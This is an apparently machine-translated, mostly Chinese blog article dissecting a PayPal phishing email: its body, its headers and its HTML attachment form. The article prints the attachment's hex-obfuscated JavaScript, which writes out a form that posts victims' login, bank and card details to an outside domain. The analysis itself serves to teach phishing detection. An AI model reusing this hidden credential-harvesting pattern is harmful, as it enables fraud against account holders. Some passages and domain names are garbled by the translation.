In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.
不要认为只有你的银行信息才是重要的:毕竟,如果有人控制了你的帐户登录,他们不仅知道该帐户中包含的信息,而且很有可能相同的登录信息会被用于其他各种帐户。如果他们泄露了你的电子邮件帐户,他们可以重置你的所有其他密码。
因此,除了保持强大和不同的密码,你必须时刻警惕伪装成真品的虚假电子邮件。虽然大多数网络钓鱼尝试是业余的,一些是相当有说服力的,所以重要的是要了解如何识别他们在表面水平,以及他们如何在引擎盖下工作。
阿西拉普图片
我们的示例电子邮件与大多数网络钓鱼尝试一样,“通知”您贝宝帐户上的活动,在正常情况下,这将是令人震惊的。因此,行动的要求是通过提交你能想到的每一条个人信息来验证/恢复你的账户。同样,这是相当公式化的。
当然也有例外,几乎每一封网络钓鱼和诈骗邮件都会直接在邮件中加载红旗。即使文字是令人信服的,你通常可以发现许多错误散落在整个邮件正文,这表明该邮件是不合法的。
消息正文
乍一看,这是我见过的最好的网络钓鱼邮件之一。这里没有拼写或语法错误,而且逐字逐句都是按照你的预期来读的。但是,当您更仔细地检查内容时,可以看到一些危险信号。
消息头
当您查看消息头时,会出现更多的红色标志:
附件
当我打开附件时,您可以立即看到布局不正确,因为它缺少样式信息。再说一次,当贝宝可以简单地在他们的网站上给你一个链接的时候,为什么要用电子邮件发送一个HTML表单呢?
注意:我们使用了Gmail内置的HTML附件查看器,但是我们建议你不要打开骗子的附件。从未。永远不会。他们经常包含漏洞,将安装特洛伊木马在您的电脑上窃取您的帐户信息。
再向下滚动一点,你可以看到这个表单不仅要求我们的贝宝登录信息,但银行和信用卡信息以及。有些图像被破坏了。
很明显,这种网络钓鱼的企图是一蹴而就。
虽然很明显这是一个网络钓鱼的企图,但我们现在要分析一下电子邮件的技术组成,看看能找到什么。
附件中的信息
首先要看附件表单的HTML源代码,它将数据提交到伪站点。
快速查看源代码时,所有链接都显示为有效,因为它们指向贝宝网“或”paypalobjects.com“都是合法的。
现在我们来看看Firefox在页面上收集的一些基本页面信息。
如您所见,一些图形是从域中提取的“blessedtobe.com网站”, “好健康药房网“和”图片-上传.de“而不是合法的贝宝域名。
邮件头中的信息
接下来我们将看看原始的电子邮件消息头。Gmail通过邮件上的Show Original菜单选项提供这一功能。
查看原始邮件的标题信息,可以看到此邮件是使用outlookexpress6编写的。我怀疑PayPal的员工中是否有人通过过时的电子邮件客户端手动发送这些消息。
现在查看路由信息,我们可以看到发送者和中继邮件服务器的IP地址。
“用户”IP地址是原始发件人。快速查找IP信息,我们可以看到发送IP在德国。
当我们看到中继邮件服务器的(邮件.itak.at),IP地址我们可以看到这是一个基于奥地利的ISP。我怀疑贝宝直接通过奥地利的ISP发送电子邮件,因为他们有一个庞大的服务器场,可以很容易地处理这项任务。
数据到哪里去了?
因此,我们已经明确确定这是一封网络钓鱼邮件,并收集了一些有关邮件来源的信息,但您的数据是从哪里发送的呢?
要看到这一点,我们必须先将HTM附件保存到桌面上,然后在文本编辑器中打开。滚动浏览它,除了看到一个可疑的Javascript块外,其他一切看起来都井然有序。
打开最后一块Javascript的完整源代码,我们看到:
<script language=”JavaScript” type=”text/javascript”> // Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y); </script>
每当你看到一个巨大的乱七八糟的字符串似乎随机字母和数字嵌入在一个Javascript块,它通常是可疑的东西。查看代码,变量“x”被设置为这个大字符串,然后被解码为变量“y”。变量“y”的最终结果将作为HTML写入文档。
由于大字符串由数字0-9和字母a-f组成,因此很可能通过简单的ASCII到十六进制转换进行编码:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
转换为:
<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>
这并不是一个巧合,这解码成一个有效的HTML表单标签,发送结果不是贝宝,而是一个流氓网站。
此外,当您查看表单的HTML源代码时,您将看到此表单标记不可见,因为它是通过Javascript动态生成的。如果有人只是简单地查看附件的生成源(正如我们之前所做的那样),而不是直接在文本编辑器中打开附件,那么这是一种隐藏HTML实际操作的聪明方法。
在违规网站上快速运行whois,我们可以看到这是一个托管在流行web主机1和1上的域。
最突出的是域使用可读的名称(与类似“dfh3”的名称相反)sjhskjhw.net网站)并且该域已注册4年。正因为如此,我相信这个域名被劫持,并作为一个棋子在这个网络钓鱼企图。
说到安全上网,有点玩世不恭是没有坏处的。
虽然我确信示例电子邮件中有更多的危险信号,但我们上面指出的是我们在几分钟的检查后看到的指标。假设,如果邮件的表层100%地模仿了它的合法副本,那么技术分析仍然可以揭示它的真实本质。这就是为什么能够同时检查你能看到和看不到的东西是重要的。
尽管电子邮件服务在过滤网络钓鱼企图方面越来越出色,但一些服务将不可避免地被过滤掉。在这一点上,你有责任发现网络钓鱼邮件并采取相应的行动。但你在发现网络钓鱼邮件方面有多在行? ...
...告 一些国家有专门处理网络钓鱼邮件的机构。在美国,网络安全和基础设施安全局(国土安全部的分支机构)要求您将邮件转发给钓鱼网站[email protected]。在英国,你可以把邮件举报给诉讼欺诈、国家欺诈和网络犯罪报道中心...
...上的冒名顶替者网站。 小心网络钓鱼的把戏 相关报道:网络安全:剖析网络钓鱼邮件 HTTPS本身并不能保证一个站点是合法的。一些聪明的网络钓鱼者已经意识到,人们寻找HTTPS指示符和锁定图标,可能会千方百计伪装自己的网...
...危险的网络钓鱼电子邮件的更多信息,请阅读在线安全:剖析网络钓鱼电子邮件。 你可能会遇到各种各样的电子邮件问题:危险的文件附件,骗取你钱财的诈骗,窃取你个人资料的网络钓鱼邮件,以及指向危险网站的链接。然...
...他们就无利可图了。 更多信息,请查看仿冒电子邮件的剖析。 鱼叉式网络钓鱼有何不同 如果说传统的网络钓鱼是撒网以图抓到什么东西的行为,那么鱼叉式网络钓鱼则是针对特定的个人或组织,并针对他们个人定制攻击的行...
...说,他们利用的是人,而不是他们的软件。 相关报道:网络安全:剖析网络钓鱼邮件 你可能已经听说过网络钓鱼,这是一种社会工程。您可能会收到一封电子邮件,声称来自您的银行、信用卡公司或其他受信任的企业。他们可...
...储计划,恶意软件,网络钓鱼和一切之间。 相关报道:网络安全:剖析网络钓鱼邮件 对我们许多人来说,垃圾邮件是公式化的,他们的伎俩是如此明显。看着垃圾邮件大笑是很容易的,但不幸的现实是,人们仍然会爱上垃圾邮...
...得对你敏感财务信息的访问权,以便获利。 相关报道:网络安全:剖析网络钓鱼邮件 这个镜头还可以帮助你了解其他令人讨厌的软件类型,比如在你的电脑上显示广告的广告软件和监视你浏览信息并通过互联网发送的间谍软件...
...网站证明是假的,并收集您的密码。恭喜,你被钓鱼了。网络钓鱼是一种由来已久的方式来获取您的登录凭据或访问您的帐户之一。网络钓鱼背后的想法非常简单:它是关于欺骗你交出你的信息,所以没有实际的黑客是必要的。...
什么是网络钓鱼(phishing)? 网络钓鱼是一种身份盗窃的方法,它依赖于个人在无意中自愿提供个人详细信息或信息,然后这些信息可能被用于邪恶的目的。这通常是通过建立一个欺诈网站,电子邮件,或文字似乎代表一个合法的...